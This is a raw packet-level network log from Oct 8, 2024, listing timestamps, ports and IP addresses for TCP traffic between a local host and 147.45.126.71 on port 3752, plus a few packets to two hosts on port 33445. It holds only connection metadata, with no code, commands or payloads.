Oct 8, 2024 20:52:32.728899002 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.728913069 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.728926897 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.728940964 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.728955984 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.728970051 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.729016066 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.729028940 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.729032040 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.729043007 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.729057074 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.729069948 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.729135990 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.729495049 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.729660988 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.729991913 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:33.037131071 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.037143946 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.037154913 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.037166119 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.037194967 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.037204981 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.037215948 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.037259102 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.037269115 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.037280083 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.037290096 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.037290096 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:33.037302017 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.037341118 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:33.037341118 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:33.037374973 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.037384033 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.037400961 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.037410021 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.037420988 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.037431002 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.037442923 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.037453890 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.037465096 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.037493944 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.037508965 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.037519932 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.037529945 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.037539959 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.037549973 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.037560940 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.037633896 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.037645102 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.037656069 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.037667036 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.037677050 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.037686110 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.037697077 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.037708998 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.037781954 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.037791967 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.037802935 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.037812948 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:33.037812948 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.037812948 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:33.037823915 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.037834883 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.037844896 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.037856102 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.037867069 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.037926912 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.037936926 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.037947893 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.037959099 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.037971020 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.037981033 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.037993908 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.038005114 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.038016081 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.038055897 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.038065910 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.038075924 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.038086891 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.038129091 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:33.038129091 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:33.038129091 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:33.038129091 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:33.038129091 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:33.038129091 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:33.038129091 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:33.038192034 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.038204908 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.038214922 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.038224936 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.038235903 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.038245916 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.038256884 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.038256884 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:33.038256884 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:33.038268089 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.038278103 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.038281918 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:33.038288116 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.038299084 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.038307905 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.038317919 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.038328886 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.038345098 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.038355112 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.038373947 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.038383007 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.038393021 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.038403034 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.038413048 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.038417101 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:33.038417101 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:33.038424015 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.038434982 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.038438082 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:33.038444996 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.038455963 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.038465977 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.038476944 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.038487911 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.038499117 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.038502932 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:33.038502932 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:33.038508892 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.038520098 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.038530111 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.038539886 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.038551092 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.038561106 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.038572073 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.038597107 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.038606882 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.038616896 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.038628101 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.038634062 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:33.038634062 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:33.038638115 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.038647890 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.038659096 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.038674116 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:33.038675070 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.038685083 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.038695097 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.038707018 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.038717985 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.038727999 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.038738966 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.038754940 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:33.038755894 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.038765907 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.038777113 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.038784027 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:33.038788080 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.038819075 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.038964033 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.038975000 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.038985014 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.038995981 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.039005995 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.039016962 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.039026976 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.039037943 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.039047956 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.039057970 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.039107084 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.039119005 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.039129019 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.039139032 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.039150000 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.039160013 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.039167881 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.039177895 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.039190054 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.039192915 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:33.039192915 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:33.039192915 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:33.039192915 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:33.039192915 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:33.039192915 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:33.039192915 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:33.039192915 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:33.039199114 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.039210081 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.039217949 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:33.039217949 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:33.039220095 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.039231062 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.039241076 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.039251089 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.039262056 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.039355993 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.039366007 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.039376020 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.039392948 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.039402008 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.039416075 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.039419889 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:33.039419889 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:33.039419889 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:33.039419889 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:33.039506912 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:33.039573908 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:33.039887905 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:33.044744968 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:39.872025013 CEST	49717	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:39.877082109 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:39.880213022 CEST	49717	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:39.880831003 CEST	49717	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:39.886812925 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:40.387367964 CEST	33445	49710	194.249.212.109	192.168.2.8
Oct 8, 2024 20:52:40.387665987 CEST	49710	33445	192.168.2.8	194.249.212.109
Oct 8, 2024 20:52:40.407923937 CEST	33445	49709	130.133.110.14	192.168.2.8
Oct 8, 2024 20:52:40.409821987 CEST	49709	33445	192.168.2.8	130.133.110.14
Oct 8, 2024 20:52:40.615055084 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:40.615067959 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:40.617260933 CEST	49717	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:40.625406027 CEST	49717	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:40.631444931 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:40.882397890 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:40.884738922 CEST	49717	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:40.890053988 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:41.146908998 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:41.149588108 CEST	49717	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:41.154952049 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:41.155047894 CEST	49717	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:41.160240889 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:41.620042086 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:41.622661114 CEST	49717	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:41.628017902 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:41.628071070 CEST	49717	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:41.633481979 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:41.979207993 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:41.979218960 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:41.980212927 CEST	49717	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:41.991219997 CEST	49717	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:41.991297007 CEST	49717	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:41.991367102 CEST	49717	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:41.991472006 CEST	49717	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:41.997643948 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:41.997653961 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:41.997764111 CEST	49717	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:41.998095989 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:41.998243093 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:41.998251915 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:41.998260975 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:41.998274088 CEST	49717	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:41.998397112 CEST	49717	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:41.998397112 CEST	49717	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:41.999016047 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:41.999026060 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:41.999038935 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:41.999047995 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:41.999057055 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:41.999068022 CEST	49717	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:41.999087095 CEST	49717	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:41.999109030 CEST	49717	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:41.999317884 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:41.999327898 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:41.999366045 CEST	49717	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:41.999382973 CEST	49717	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:42.003787994 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:42.003843069 CEST	49717	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:42.003855944 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:42.003901005 CEST	49717	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:42.004369974 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:42.004425049 CEST	49717	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:42.004528999 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:42.004542112 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:42.004589081 CEST	49717	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:42.005013943 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:42.005160093 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:42.005314112 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:42.005482912 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:42.005492926 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:42.010026932 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:42.010036945 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:42.010529995 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:42.010674000 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:42.010683060 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:42.010691881 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:42.010860920 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:42.480195999 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:42.483128071 CEST	49717	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:42.483254910 CEST	49717	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:42.483311892 CEST	49717	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:42.488559008 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:42.488569975 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:42.488578081 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:42.488586903 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:42.488595963 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:42.488600016 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:42.488624096 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:42.488634109 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:42.488641977 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:42.488670111 CEST	49717	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:42.493525028 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:42.876394987 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:42.881294012 CEST	49717	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:42.881438971 CEST	49717	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:42.881525993 CEST	49717	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:42.881665945 CEST	49717	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:42.881701946 CEST	49717	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:42.891304970 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:42.891504049 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:42.891540051 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:42.891578913 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:42.891621113 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:42.891630888 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:42.891639948 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:42.891663074 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:42.891674042 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:42.891701937 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:42.891711950 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:42.891720057 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:42.891755104 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:42.891763926 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:42.891859055 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:43.113238096 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:43.115328074 CEST	49717	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:43.124517918 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:43.125168085 CEST	49717	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:43.133744955 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:43.574465036 CEST	3752	49717	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:43.640753031 CEST	49717	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:44.600718975 CEST	49717	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:44.605528116 CEST	3752	49717	147.45.126.71	192.168.2.8
